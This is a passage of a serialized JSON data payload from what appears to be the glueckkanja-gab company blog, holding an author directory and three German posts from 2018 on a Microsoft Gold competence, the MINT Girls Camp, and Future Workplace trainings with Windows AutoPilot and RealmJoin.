[{"data":1,"prerenderedAt":30831},["ShallowReactive",2],{"post-/posts/2025-08-28-agent-ready-infrastructure copy":3,"authors_data":4,"content-posts-d887737123081":345},null,{"id":5,"extension":6,"meta":7,"stem":343,"__hash__":344},"authors_data/authors.json","json",{"path":8,"Alexander Schlindwein":9,"Sophie Luna":15,"Nadine Kern":23,"Karsten Kleinschmidt":30,"Julian Wendt":36,"Holger Bunkradt":41,"Ralf Mania":47,"Oliver Kieselbach":53,"Steffen Schwerdtfeger":59,"Gunnar Winter":67,"Jan Petersen":72,"Thorsten Kunzi":77,"Moritz Pohl":81,"Thorben Pöschus":86,"Christoph Hannebauer":92,"Marco Scheel":96,"Christopher Brumm":101,"Florian Klante":108,"Niklas Bachmann":113,"Nils Krautkrämer":118,"Patrick Treptau":124,"Peter Beckendorf":129,"Patrick Sobau":134,"Jörg Wunderlich":139,"Michael Breither":143,"Christian Kanja":148,"Zeba Hoffmann":154,"Jochen Fröhlich":159,"Jan Geisbauer":163,"Gerrit Reinke":175,"Christian Kordel":181,"Stephan Wälde":185,"Carolin Kanja":190,"Adrian Ritter":196,"Marvin Bangert":201,"Thorsten Pickhan":207,"Christian Lorenz":213,"Denis Böhm":218,"Fabian Bader":223,"Juan Jose Fernandez Perez":229,"Mahschid Sayyar":234,"Benjamin Dassow":239,"Markus Walschburger":244,"Jonathan Haist":249,"Daniel Rohregger":254,"Thomas Naunheim":259,"Florian Stöckl":264,"Pascal Asch":269,"Markus Kättner":274,"Anna Ulbricht":281,"body":288,"title":342,"Thorben Poeschus":86,"Nils Krautkraemer":118,"Joerg Wunderlich":139,"Jochen Froehlich":159,"Stephan Waelde":185,"Denis Boehm":218,"Florian Stoeckl":264,"Markus Kaettner":274},"/authors",{"display_name":10,"avatar":11,"permalink":12,"twitter":13,"linkedin":14},"Alexander Schlindwein","people/people-alexander-rudolph.png","/authors/alexander-schlindwein","AlexanderOnIT","schlindwein-alexander",{"display_name":16,"avatar":17,"permalink":18,"twitter":19,"linkedin":20,"imageOffsetLeft":21,"imageOffsetTop":22},"Sophie Luna","c_thumb,h_1600,w_1600/people/people-sophie-luna.jpg","/authors/sophie-luna","glueckkanjagab","../company/glueckkanja-gab","58%","67%",{"display_name":24,"avatar":25,"permalink":26,"twitter":27,"linkedin":28,"imageOffsetTop":29},"Nadine Kern","people/people-nadine-kern.png","/authors/nadine-kern","nadineausRT","nadine-kern","72%",{"display_name":31,"avatar":32,"permalink":33,"twitter":34,"linkedin":35},"Karsten Kleinschmidt","people/people-karsten-kleinschmidt.png","/authors/karsten-kleinschmidt","KarstenonIT","karstenkleinschmidt",{"display_name":37,"avatar":38,"permalink":39,"linkedin":40},"Julian Wendt","people/people-julian-wendt.png","/authors/julian-wendt","julian-wendt",{"display_name":42,"avatar":43,"permalink":44,"linkedin":45,"twitter":46},"Holger Bunkradt","people/people-holger-bunkradt.png","/authors/holger-bunkradt","holger-bunkradt-12b5053b","hbunkradt",{"display_name":48,"avatar":49,"permalink":50,"linkedin":51,"twitter":52},"Ralf Mania","people/people-ralf-mania.png","/authors/ralf-mania","ralf-mania-146a2757","RaMa1976",{"display_name":54,"avatar":55,"permalink":56,"linkedin":57,"twitter":58},"Oliver Kieselbach","people/people-oliver-kieselbach.png","/authors/oliver-kieselbach","oliver-kieselbach-a4a3409","okieselbT",{"display_name":60,"avatar":61,"permalink":62,"linkedin":63,"twitter":64,"imageOffsetTop":65,"imageOffsetLeft":66},"Steffen Schwerdtfeger","people/people-steffen-schwerdtfeger.png","/authors/steffen-schwerdtfeger","steffen-schwerdtfeger","SteffenAtCloud","79%","51%",{"display_name":68,"avatar":69,"permalink":70,"twitter":19,"linkedin":71},"Gunnar Winter","c_thumb,h_1600,w_1600/people/people-gunnar-winter.jpg","/authors/gunnar-winter","company/glueckkanja-gab",{"display_name":73,"avatar":74,"permalink":75,"twitter":19,"linkedin":76},"Jan Petersen","c_thumb,h_1600,w_1600/people/jan-petersen.png","/authors/jan-petersen","jan-petersen-26a901",{"display_name":78,"avatar":79,"permalink":80,"twitter":19,"linkedin":71,"imageOffsetTop":29},"Thorsten Kunzi","c_thumb,h_1600,w_1600/people/author-thorsten-kunzi.png","/authors/thorsten-kunzi",{"display_name":82,"avatar":83,"permalink":84,"twitter":19,"linkedin":85},"Dr. Moritz Pohl","c_thumb,h_1600,w_1600/people/people-moritz-pohl.png","/authors/moritz-pohl","dr-moritz-pohl",{"display_name":87,"avatar":88,"permalink":89,"twitter":90,"linkedin":91},"Thorben Pöschus","c_thumb,h_1600,w_1600/people/thorben.poeschus.png","/authors/thorben-poeschus","TPO901","thorben-pöschus-624693b7",{"display_name":93,"avatar":94,"permalink":95,"twitter":19,"linkedin":71,"imageOffsetTop":29},"Dr. Christoph Hannebauer","people/people-christoph-hannebauer.png","/authors/christoph-hannebauer",{"display_name":97,"avatar":98,"permalink":99,"twitter":100,"linkedin":100},"Marco Scheel","c_thumb,h_1600,w_1600/people/people-marco-scheel.png","/authors/marco-scheel","marcoscheel",{"display_name":102,"avatar":103,"permalink":104,"twitter":105,"linkedin":106,"imageOffsetTop":107},"Christopher Brumm","c_thumb,h_1600,w_1600/people/people-christopher-brumm.jpg","/authors/christopher-brumm","cbrhh","christopherbrumm","66%",{"display_name":109,"avatar":110,"permalink":111,"linkedin":112,"twitter":19},"Florian Klante","c_thumb,h_1600,w_1600/people/florian-klante.jpg","/authors/florian-klante","florian-klante-6031b31b",{"display_name":114,"avatar":115,"permalink":116,"linkedin":117,"twitter":19},"Niklas Bachmann","c_thumb,h_1600,w_1600/people/niklas.bachmann.png","/authors/niklas-bachmann","niklas-bachmann-66a863158",{"display_name":119,"avatar":120,"permalink":121,"twitter":122,"linkedin":123},"Nils Krautkrämer","c_thumb,h_1600,w_1600/people/nils-krautkraemer.png","/authors/nils-krautkraemer","KrauNils","nils-krautkrämer-8b04bb250",{"display_name":125,"avatar":126,"permalink":127,"linkedin":128,"twitter":19},"Patrick Treptau","c_thumb,h_1600,w_1600/people/people-patrick-treptau.png","/authors/patrick-traptau","ptreptau",{"display_name":130,"avatar":131,"permalink":132,"linkedin":133,"twitter":19,"imageOffsetTop":29},"Peter Beckendorf","c_thumb,h_1600,w_1600/people/peter-beckendorf.png","/authors/peter-beckendorf","peter-beckendorf-29a239b1",{"display_name":135,"avatar":136,"permalink":137,"linkedin":138,"twitter":19},"Patrick Sobau","c_thumb,h_1600,w_1600/people/patrick-sobau.png","/authors/patrick-sobau","patrick-sobau",{"display_name":140,"avatar":141,"permalink":142,"twitter":19},"Jörg Wunderlich","c_thumb,h_1600,w_1600/people/joerg-wunderlich.png","/authors/joerg-wunderlich",{"display_name":144,"avatar":145,"permalink":146,"twitter":19,"linkedin":147},"Michael Breither","c_thumb,h_1600,w_1600/people/people-michael-breither.jpg","/authors/michael-breither","michaelbreither",{"display_name":149,"avatar":150,"permalink":151,"twitter":152,"linkedin":153},"Christian Kanja","c_thumb,h_1600,w_1600/people/people-christian-kanja.png","/authors/christian-kanja","cekageka","christian-kanja",{"display_name":155,"avatar":156,"permalink":157,"linkedin":158,"twitter":19},"Zeba Hoffmann","c_thumb,h_1600,w_1600/people/zeba-hoffmann.png","/authors/zeba-hoffmann","zebahoffmann",{"display_name":160,"avatar":161,"permalink":162,"twitter":19,"linkedin":71},"Jochen Fröhlich","c_thumb,h_1600,w_1600/people/people-jochen-froehlich.png","/authors/jochen-froehlich",{"display_name":164,"avatar":165,"permalink":166,"twitter":167,"linkedin":167,"imageOffsetTop":29,"socials":168},"Jan Geisbauer","c_thumb,h_1600,w_1600/people/people-jan-geisbauer-csoc.png","/authors/jan-geisbauer","JanGeisbauer",[169,172],{"text":170,"href":171},"Blog","https://emptydc.com",{"text":173,"href":174},"Podcast","https://hairlessinthecloud.com",{"display_name":176,"avatar":177,"permalink":178,"twitter":179,"linkedin":180},"Gerrit Reinke","c_thumb,h_1600,w_1600/people/gerrit-reinke.png","/authors/gerrit-reinke","GLWRe","glwr",{"display_name":182,"avatar":183,"permalink":184,"twitter":19,"linkedin":71},"Christian Kordel","c_thumb,h_1600,w_1600/people/christian-kordel.png","/authors/christian-kordel",{"display_name":186,"avatar":187,"permalink":188,"twitter":189,"linkedin":71},"Stephan Wälde","c_thumb,h_1600,w_1600/people/people-stephan-waelde.png","/authors/stephan-waelde","stephanwaelde",{"display_name":191,"avatar":192,"permalink":193,"twitter":194,"linkedin":195},"Carolin Kanja","c_thumb,h_1600,w_1600/people/people-carolin-kanja.jpg","/authors/carolin-kanja","fraukanja","carolin-kanja",{"display_name":197,"avatar":198,"permalink":199,"twitter":200,"linkedin":200},"Adrian Ritter","c_thumb,h_1600,w_1600/people/people-adrian-ritter.png","/authors/adrian-ritter","adrianritter",{"display_name":202,"avatar":203,"permalink":204,"twitter":205,"linkedin":206},"Marvin Bangert","c_thumb,h_1600,w_1600/people/people-marvin-bangert.png","/authors/marvin-bangert","marvinbangert","marvin-bangert",{"display_name":208,"avatar":209,"permalink":210,"twitter":211,"linkedin":212},"Thorsten Pickhan","c_thumb,h_1600,w_1600/people/people-thorsten-pickhan.png","/authors/thorsten-pickhan","tpickhan","thorsten-pickhan",{"display_name":214,"avatar":215,"permalink":216,"linkedin":217,"twitter":19},"Christian Lorenz","c_thumb,h_1600,w_1600/people/people-christian-lorenz.png","/authors/christian-lorenz","christianlorenz95",{"display_name":219,"avatar":220,"permalink":221,"linkedin":222,"twitter":19},"Denis Böhm","c_thumb,h_1600,w_1600/people/people-denis-boehm.png","/authors/denis-boehm","denis-böhm-3bb834135",{"display_name":224,"avatar":225,"permalink":226,"linkedin":227,"twitter":228},"Fabian Bader","c_thumb,h_1600,w_1600/people/people-fabian-bader.jpg","/authors/fabian-bader","fabianbader","fabian_bader",{"display_name":230,"avatar":231,"permalink":232,"linkedin":233},"Juan Jose Fernandez Perez","c_thumb,h_1600,w_1600/people/people-juan-jose-fernandez.jpg","/authors/juan-jose-fernandez-perez","juan-jose-fernandez-perez-8016055",{"display_name":235,"avatar":236,"permalink":237,"linkedin":238},"Mahschid Sayyar","c_thumb,h_1600,w_1600/people/people-mahschid-sayyar.jpg","/authors/mahschid-sayyar","mahschid-sayyar-97544463",{"display_name":240,"avatar":241,"permalink":242,"linkedin":243},"Benjamin Dassow","c_thumb,h_1600,w_1600/people/people-benjamin-dassow.jpg","/authors/benjamin-dassow","benjamin-dassow",{"display_name":245,"avatar":246,"permalink":247,"linkedin":248},"Markus Walschburger","c_thumb,h_1600,w_1600/people/people-markus-walschburger.jpg","/authors/markus-walschburger","markus-walschburger",{"display_name":250,"avatar":251,"permalink":252,"linkedin":253,"imageOffsetTop":29},"Jonathan Haist","c_thumb,h_1600,w_1600/people/people-jonathan-haist.jpg","/authors/jonathan-haist","jonathanhaist",{"display_name":255,"avatar":256,"permalink":257,"linkedin":258,"imageOffsetTop":29},"Daniel Rohregger","c_thumb,h_1600,w_1600/people/people-daniel-rohregger.jpg","/authors/daniel-rohregger","drohregger",{"display_name":260,"avatar":261,"permalink":262,"linkedin":263,"imageOffsetTop":107},"Thomas Naunheim","c_thumb,h_1600,w_1600/people/people-thomas-naunheim.jpg","/authors/thomas-naunheim","thomasnaunheim",{"display_name":265,"avatar":266,"permalink":267,"linkedin":268,"imageOffsetTop":107},"Florian Stöckl","c_thumb,h_1600,w_1600/people/people-florian-stoeckl.jpg","/authors/florian-stoeckl","florianstoeckl",{"display_name":270,"avatar":271,"permalink":272,"linkedin":273,"imageOffsetTop":107},"Pascal Asch","c_thumb,h_1600,w_1600/people/Pascal.Asch.648.jpg","/authors/pascal-asch","pascal-asch",{"display_name":275,"avatar":276,"permalink":277,"linkedin":278,"imageOffsetTop":279,"imageOffsetLeft":280},"Markus Kättner","c_thumb,h_1600,w_1600/people/markus-kaettner.jpg","/authors/markus-kaettner","markus-kättner-b600119","62%","63%",{"display_name":282,"avatar":283,"permalink":284,"linkedin":285,"imageOffsetTop":286,"imageOffsetLeft":287},"Anna Ulbricht","c_thumb,h_1600,w_1600/people/anna-katharina.ulbricht-09.png","/authors/anna-ulbricht","anna-katharina-u-a67702199","70%","50%",{"Alexander Schlindwein":289,"Sophie Luna":290,"Nadine Kern":291,"Karsten Kleinschmidt":292,"Julian Wendt":293,"Holger Bunkradt":294,"Ralf Mania":295,"Oliver Kieselbach":296,"Steffen Schwerdtfeger":297,"Gunnar Winter":298,"Jan Petersen":299,"Thorsten Kunzi":300,"Moritz Pohl":301,"Thorben Pöschus":302,"Christoph Hannebauer":303,"Marco Scheel":304,"Christopher Brumm":305,"Florian Klante":306,"Niklas Bachmann":307,"Nils Krautkrämer":308,"Patrick Treptau":309,"Peter Beckendorf":310,"Patrick Sobau":311,"Jörg Wunderlich":312,"Michael Breither":313,"Christian Kanja":314,"Zeba Hoffmann":315,"Jochen Fröhlich":316,"Jan Geisbauer":317,"Gerrit Reinke":321,"Christian Kordel":322,"Stephan Wälde":323,"Carolin Kanja":324,"Adrian Ritter":325,"Marvin Bangert":326,"Thorsten Pickhan":327,"Christian Lorenz":328,"Denis Böhm":329,"Fabian Bader":330,"Juan Jose Fernandez Perez":331,"Mahschid Sayyar":332,"Benjamin Dassow":333,"Markus Walschburger":334,"Jonathan Haist":335,"Daniel Rohregger":336,"Thomas Naunheim":337,"Florian Stöckl":338,"Pascal Asch":339,"Markus Kättner":340,"Anna Ulbricht":341},{"display_name":10,"avatar":11,"permalink":12,"twitter":13,"linkedin":14},{"display_name":16,"avatar":17,"permalink":18,"twitter":19,"linkedin":20,"imageOffsetLeft":21,"imageOffsetTop":22},{"display_name":24,"avatar":25,"permalink":26,"twitter":27,"linkedin":28,"imageOffsetTop":29},{"display_name":31,"avatar":32,"permalink":33,"twitter":34,"linkedin":35},{"display_name":37,"avatar":38,"permalink":39,"linkedin":40},{"display_name":42,"avatar":43,"permalink":44,"linkedin":45,"twitter":46},{"display_name":48,"avatar":49,"permalink":50,"linkedin":51,"twitter":52},{"display_name":54,"avatar":55,"permalink":56,"linkedin":57,"twitter":58},{"display_name":60,"avatar":61,"permalink":62,"linkedin":63,"twitter":64,"imageOffsetTop":65,"imageOffsetLeft":66},{"display_name":68,"avatar":69,"permalink":70,"twitter":19,"linkedin":71},{"display_name":73,"avatar":74,"permalink":75,"twitter":19,"linkedin":76},{"display_name":78,"avatar":79,"permalink":80,"twitter":19,"linkedin":71,"imageOffsetTop":29},{"display_name":82,"avatar":83,"permalink":84,"twitter":19,"linkedin":85},{"display_name":87,"avatar":88,"permalink":89,"twitter":90,"linkedin":91},{"display_name":93,"avatar":94,"permalink":95,"twitter":19,"linkedin":71,"imageOffsetTop":29},{"display_name":97,"avatar":98,"permalink":99,"twitter":100,"linkedin":100},{"display_name":102,"avatar":103,"permalink":104,"twitter":105,"linkedin":106,"imageOffsetTop":107},{"display_name":109,"avatar":110,"permalink":111,"linkedin":112,"twitter":19},{"display_name":114,"avatar":115,"permalink":116,"linkedin":117,"twitter":19},{"display_name":119,"avatar":120,"permalink":121,"twitter":122,"linkedin":123},{"display_name":125,"avatar":126,"permalink":127,"linkedin":128,"twitter":19},{"display_name":130,"avatar":131,"permalink":132,"linkedin":133,"twitter":19,"imageOffsetTop":29},{"display_name":135,"avatar":136,"permalink":137,"linkedin":138,"twitter":19},{"display_name":140,"avatar":141,"permalink":142,"twitter":19},{"display_name":144,"avatar":145,"permalink":146,"twitter":19,"linkedin":147},{"display_name":149,"avatar":150,"permalink":151,"twitter":152,"linkedin":153},{"display_name":155,"avatar":156,"permalink":157,"linkedin":158,"twitter":19},{"display_name":160,"avatar":161,"permalink":162,"twitter":19,"linkedin":71},{"display_name":164,"avatar":165,"permalink":166,"twitter":167,"linkedin":167,"imageOffsetTop":29,"socials":318},[319,320],{"text":170,"href":171},{"text":173,"href":174},{"display_name":176,"avatar":177,"permalink":178,"twitter":179,"linkedin":180},{"display_name":182,"avatar":183,"permalink":184,"twitter":19,"linkedin":71},{"display_name":186,"avatar":187,"permalink":188,"twitter":189,"linkedin":71},{"display_name":191,"avatar":192,"permalink":193,"twitter":194,"linkedin":195},{"display_name":197,"avatar":198,"permalink":199,"twitter":200,"linkedin":200},{"display_name":202,"avatar":203,"permalink":204,"twitter":205,"linkedin":206},{"display_name":208,"avatar":209,"permalink":210,"twitter":211,"linkedin":212},{"display_name":214,"avatar":215,"permalink":216,"linkedin":217,"twitter":19},{"display_name":219,"avatar":220,"permalink":221,"linkedin":222,"twitter":19},{"display_name":224,"avatar":225,"permalink":226,"linkedin":227,"twitter":228},{"display_name":230,"avatar":231,"permalink":232,"linkedin":233},{"display_name":235,"avatar":236,"permalink":237,"linkedin":238},{"display_name":240,"avatar":241,"permalink":242,"linkedin":243},{"display_name":245,"avatar":246,"permalink":247,"linkedin":248},{"display_name":250,"avatar":251,"permalink":252,"linkedin":253,"imageOffsetTop":29},{"display_name":255,"avatar":256,"permalink":257,"linkedin":258,"imageOffsetTop":29},{"display_name":260,"avatar":261,"permalink":262,"linkedin":263,"imageOffsetTop":107},{"display_name":265,"avatar":266,"permalink":267,"linkedin":268,"imageOffsetTop":107},{"display_name":270,"avatar":271,"permalink":272,"linkedin":273,"imageOffsetTop":107},{"display_name":275,"avatar":276,"permalink":277,"linkedin":278,"imageOffsetTop":279,"imageOffsetLeft":280},{"display_name":282,"avatar":283,"permalink":284,"linkedin":285,"imageOffsetTop":286,"imageOffsetLeft":287},"Authors","authors","Qkbr0Ywae26Kxloa5JhqFSd0eMg8Ccs9DhjH7FyMzvY",[346,424,476,546,719,971,1129,1199,1271,1309,1410,1480,1524,1564,1627,1775,1827,1883,1922,2131,2301,2438,2504,2542,2701,2743,2865,2959,3071,3299,3552,3701,3813,3937,4011,4099,4247,4288,4346,4414,4673,4729,4781,4892,4973,5156,5286,5348,5475,5605,5680,5903,5985,6100,6208,6296,6337,6432,6549,6833,6916,7012,7178,7248,7360,7511,7660,7691,7732,7872,7910,8022,8211,8341,8404,8482,8554,8634,8724,9069,9121,9174,9236,9290,9334,9547,9778,9886,9996,10094,10166,10229,10285,10462,10621,10963,11247,11608,12161,12828,12923,13058,13276,13349,13502,13612,13821,26282,26491,26631,27393,27644,27816,27982,28111,28235,29056,29623,30234,30297,30603],{"id":347,"title":348,"author":191,"body":349,"cta":3,"description":402,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":408,"moment":414,"navigation":415,"path":416,"seo":417,"stem":418,"tags":419,"webcast":406,"__hash__":423},"content_de/posts/2018-01-10-6x-gold-kompetenz.md","Goldene Zeiten für Glück & Kanja und seine Kunden",{"type":350,"value":351,"toc":401},"minimal",[352,360,363,366,398],[353,354,355],"p",{},[356,357],"img",{"alt":358,"src":359},"6-fach Gold","/img/logos/mpn-sixth-gold-competence.png",[353,361,362],{},"Na gut, beschenken ist nicht ganz richtig. Natürlich mussten wir gewisse Kriterien erfüllen, die dem Kunden garantieren, dass wir auf dem Gebiet umfassende Kenntnisse und Projekterfahrung haben.\nSo konnten wir im vergangenen Jahr bei zwei Global Playern aus den Bereichen Logistik und Versorgung tausende moderner Arbeitsplätze weltweit mit 100% Cloud bereitstellen.",[353,364,365],{},"Wenn auch Ihre Vision eine Infrastruktur ohne lokale Server (= 100% Cloud) ist, haben wir zahlreiche Angebote für Sie:",[367,368,369,381,389],"ul",{},[370,371,372,373,380],"li",{},"Sehen Sie sich unsere ",[374,375,379],"a",{"href":376,"rel":377},"https://www.glueckkanja.com/unternehmen/webcasts/",[378],"nofollow","Webcasts"," zum Thema 100% Cloud an und verpassen Sie nicht den nächsten Termin am Freitag, 16.02.2018, wenn wir über unsere eigene Cloud Migration sprechen.",[370,382,383,384],{},"Kommen Sie zu einem unserer ",[374,385,388],{"href":386,"rel":387},"https://www.glueckkanja.com/unternehmen/trainings/",[378],"Future Workplace Trainings",[370,390,391,392,397],{},"Lesen Sie auf unserer ",[374,393,396],{"href":394,"rel":395},"https://www.glueckkanja.com/",[378],"Webseite"," und in unserem Blog mehr über die Themen Windows 10, Windows AutoPilot, 100% Cloud etc.",[399,400],"hr",{},{"title":402,"searchDepth":403,"depth":403,"links":404},"",2,[],"md",false,"post",{"categories":409,"blogtitlepic":411,"thumb":412,"customExcerpt":413},[410],"Corporate","head-sixth-gold-competence","thumb-sixth-gold-competence","Das fängt ja gut an: Kurz bevor sich das Jahr 2017 verabschiedet hat, beschenkte uns Microsoft mit der bereits sechsten Gold Kompetenz, die den schönen Namen Windows and Devices trägt. Da kann 2018 kommen!","2018-01-10",true,"/posts/2018-01-10-6x-gold-kompetenz",{"title":348,"description":402},"posts/2018-01-10-6x-gold-kompetenz",[420,421,422],"100 Cloud","Provisionierung","Microsoft","hOaj24pgywvQUp72zUh88A-_IGV04lKTTVAfW53SZCY",{"id":425,"title":426,"author":191,"body":427,"cta":3,"description":462,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":463,"moment":469,"navigation":415,"path":470,"seo":471,"stem":472,"tags":473,"webcast":406,"__hash__":475},"content_de/posts/2018-02-05-mint-girls-camp.md","Glück & Kanja Luft schnuppern beim MINT Girls Camp",{"type":350,"value":428,"toc":460},[429,437,448,457],[353,430,431,432,436],{},"Ziel ist es, durch eine Mischung aus beruflicher Orientierung und einem attraktiven Ferienprogramm Mädchen für naturwissenschaftlich-technische Ausbildungsberufe zu begeistern. Sie erleben eine spannende Woche, in der sie selbst werkeln und viel ausprobieren können. Außerdem haben sie die Möglichkeit, andere Berufseinsteiger kennen zu lernen und Fragen zur Berufswahl und der richtigen Bewerbung zu stellen. Neben dem Kooperationspartner Provadis - Partner für Bildung und Beratung GmbH für die Praxistage - bietet die Sportjugend Hessen als Mitinitiator des ",[433,434,435],"strong",{},"MINT Girls Camps"," ein sportliches Rahmenprogramm mit u.a. Klettern, Schwimmen, Voltigieren und diversen Ballspielen.",[353,438,439,440,443,444,447],{},"Das MINT Girls Camp in ",[433,441,442],{},"Offenbach"," findet in den Herbstferien vom ",[433,445,446],{},"7. bis 12. Oktober 2018"," statt. Wer Informatik spannend findet und ein Beruf in diesem Bereich in seine engere Auswahl nehmen möchte, ist herzlich eingeladen, ein paar Tage mit unseren Glück & Kanja Techies zu verbringen. Wir sorgen für spannende Einblicke und coole Projekte!",[353,449,450,451,456],{},"Alle Infos sowie das Formular für die Anmeldung findest Du unter ",[374,452,455],{"href":453,"rel":454},"https://www.mint-girls-camps.de/",[378],"www.mint-girls-camps.de",".",[353,458,459],{},"Gefördert wird das Projekt aus Mitteln des Hessischen Ministeriums für Wirtschaft, Energie, Verkehr und Landesentwicklung und der Europäischen Union – Europäischer Sozialfonds sowie der Bundesagentur für Arbeit. Die Teilnehmerinnen müssen lediglich einen Eigenbeitrag von 50 Euro beisteuern.",{"title":402,"searchDepth":403,"depth":403,"links":461},[],"Ziel ist es, durch eine Mischung aus beruflicher Orientierung und einem attraktiven Ferienprogramm Mädchen für naturwissenschaftlich-technische Ausbildungsberufe zu begeistern. Sie erleben eine spannende Woche, in der sie selbst werkeln und viel ausprobieren können. Außerdem haben sie die Möglichkeit, andere Berufseinsteiger kennen zu lernen und Fragen zur Berufswahl und der richtigen Bewerbung zu stellen. Neben dem Kooperationspartner Provadis - Partner für Bildung und Beratung GmbH für die Praxistage - bietet die Sportjugend Hessen als Mitinitiator des MINT Girls Camps ein sportliches Rahmenprogramm mit u.a. Klettern, Schwimmen, Voltigieren und diversen Ballspielen.",{"categories":464,"blogtitlepic":465,"thumb":466,"socialimg":467,"customExcerpt":468},[410],"head-mint-girls-camp","thumb-mint-girls-camp","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/heads/head-mint-girls-camp.jpg","Den Organisatoren des MINT Girls Camp ist es ein Anliegen, Mädchen aus Hessen Berufe aus den Bereichen Mathematik, Informatik, Naturwissenschaft und Technik, kurz MINT, näher zu bringen. Wir halten das für eine tolle Sache und sind daher gerne mit dabei.","2018-02-08","/posts/2018-02-05-mint-girls-camp",{"title":426,"description":462},"posts/2018-02-05-mint-girls-camp",[474],"Employer Branding","9BJt68SM10W-85PulnDG40EEEHkVXhryPH7XJWPzjXk",{"id":477,"title":478,"author":479,"body":481,"cta":3,"description":531,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":532,"moment":539,"navigation":415,"path":540,"seo":541,"stem":542,"tags":543,"webcast":406,"__hash__":545},"content_de/posts/2018-02-12-summary-future-workplace-trainings.md","Auftakt Future Workplace Trainings: ein voller Erfolg",[54,480],"Moritz Pohl",{"type":350,"value":482,"toc":529},[483,496,503,510,516,519,526],[353,484,485,486,489,490,495],{},"Das Konzept des modernen Arbeitsplatzes für die Zukunft wurde tiefgehend erläutert und mit einem ",[433,487,488],{},"Hands-On Part"," kombiniert, so dass die Teilnehmer erste praktische Erfahrungen in diesem Bereich sammeln konnten. Jeder Tag startete mit einer anfänglichen Theorieeinheit, wobei es schnell in das praktische Hands-On überging. Hierbei richteten die Teilnehmer ihren eigenen Azure Tenant ein, welcher durch Glück & Kanja im Vorhinein samt Lizenzen zur Verfügung gestellt wurde. Am Ende wurde ein modernes Windows Provisioning eines Windows 10 Clients durchgeführt und Anwendungen über unser Produkt ",[374,491,494],{"href":492,"rel":493},"https://realmjoin.com",[378],"RealmJoin"," zur Verfügung gestellt.",[353,497,498,499,502],{},"Die Teilnehmer lernten am ersten Tag im Rahmen des ",[433,500,501],{},"Windows Provisioning"," mit Microsoft 365 die notwendigen Konfigurationen in Azure Active Directory, Operations Management Suite - Windows Analytics, Intune, Windows Update for Business und Windows AutoPilot kennen. Dabei wurden alle wichtigen Aspekte des Clients betrachtet: das Enrollment, die Konfiguration, das Verteilen von Anwendungen und alle dazu gehörig relevanten Dienste.",[353,504,505,506,509],{},"Am zweiten Tag wurde das ",[433,507,508],{},"Client Management mit RealmJoin"," behandelt und ebenfalls alle notwendigen Architekturen, Konzepte und Konfigurationen nicht nur besprochen, sondern auch wieder live durchleuchtet und in der zur Verfügung gestellten Testumgebung konfiguriert. Am Ende verteilten die Teilnehmer erfolgreich erste Anwendungen und Einstellungen mittels RealmJoin an ihren zuvor provisionierten Windows 10 Client. Hierbei kristallisierte sich erneut schnell heraus, wie sehr unser Produkt RealmJoin eine „Feature Lücke“ im Zukunftskonzept „Modern Workplace“ schließt und die Microsoft Infrastruktur ergänzt. Genau aus diesem Grund bezeichnen wir unser Produkt auch gerne als „Intune Companion App“, da wir genau die fehlenden Funktionalitäten abdecken, um z.B. erfolgreich Win32 Anwendungen zu verteilen und andere fehlende Features in dem Modern Workplace Konzept auf Basis des „Microsoft 365 powered Device“ abdecken zu können.",[353,511,512],{},[356,513],{"alt":514,"src":515},"Training Windows Provisioning","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/pics/training-moritz-pohl.jpg",[353,517,518],{},"Während des ganzen Trainings kam es immer wieder zu spannenden Diskussionen rund um den Einsatz dieses modernen, auf Mobility ausgelegten, Konzepts. Hierbei wurde schnell klar, dass dieses Thema nicht nur uns stark vorantreibt, sondern auch unsere Partner und Kunden. Bei gemeinschaftlichen Mittag- und Abendessen konnten sich alle Teilnehmer besser kennenlernen und das ein oder andere Thema nochmals tiefer diskutieren. Es war ein sehr angenehmes Beisammensein mit tollen Gesprächen (nicht nur rund um IT 😊).",[353,520,521,522,525],{},"Das ",[433,523,524],{},"Feedback der Teilnehmer war außerordentlich gut"," und hat uns gezeigt, dass wir unseren technologischen Ansatz gut vermitteln können. Natürlich werden wir unser Trainingskonzept nicht statisch weiterführen, denn in einem Markt der alle 6 Monate eine neue Windows 10 Version bereithält, wöchentlich Intune ein Release-Update erfährt und auch unsere eigene Software sich stetig weiterentwickelt, werden wir unsere Trainings immer auf dem aktuellen Stand halten und neueste Technologien mit einbeziehen. Auch wenn sie ggf. noch nicht zum Einsatz kommen sollten, werden wir einen Überblick geben und mit ihnen gerne über den Einsatzzweck, Ideen und Prozesse diskutieren. Dafür halten wir uns selbst auf dem aktuellen Stand und sind für Sie immer ganz vorne mit dabei.",[353,527,528],{},"Wir freuen uns darauf, Sie bei einem unserer nächsten Trainings begrüßen zu dürfen.",{"title":402,"searchDepth":403,"depth":403,"links":530},[],"Das Konzept des modernen Arbeitsplatzes für die Zukunft wurde tiefgehend erläutert und mit einem Hands-On Part kombiniert, so dass die Teilnehmer erste praktische Erfahrungen in diesem Bereich sammeln konnten. Jeder Tag startete mit einer anfänglichen Theorieeinheit, wobei es schnell in das praktische Hands-On überging. Hierbei richteten die Teilnehmer ihren eigenen Azure Tenant ein, welcher durch Glück & Kanja im Vorhinein samt Lizenzen zur Verfügung gestellt wurde. Am Ende wurde ein modernes Windows Provisioning eines Windows 10 Clients durchgeführt und Anwendungen über unser Produkt RealmJoin zur Verfügung gestellt.",{"categories":533,"blogtitlepic":535,"thumb":536,"socialimg":537,"customExcerpt":538},[534],"Workplace","head-summary-future-workplace-trainings","thumb-summary-future-workplace-trainings","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/heads/head-summary-future-workplace-trainings.jpg","Zwei spannende Tage mit Kunden und Partnern rund um den Future Workplace liegen hinter uns. Am 1. und 2. Februar 2018 haben wir in unseren neuen Büroräumen in Offenbach das Modern Windows Provisioning Training veranstaltet und können rückblickend stolz feststellen: es war ein voller 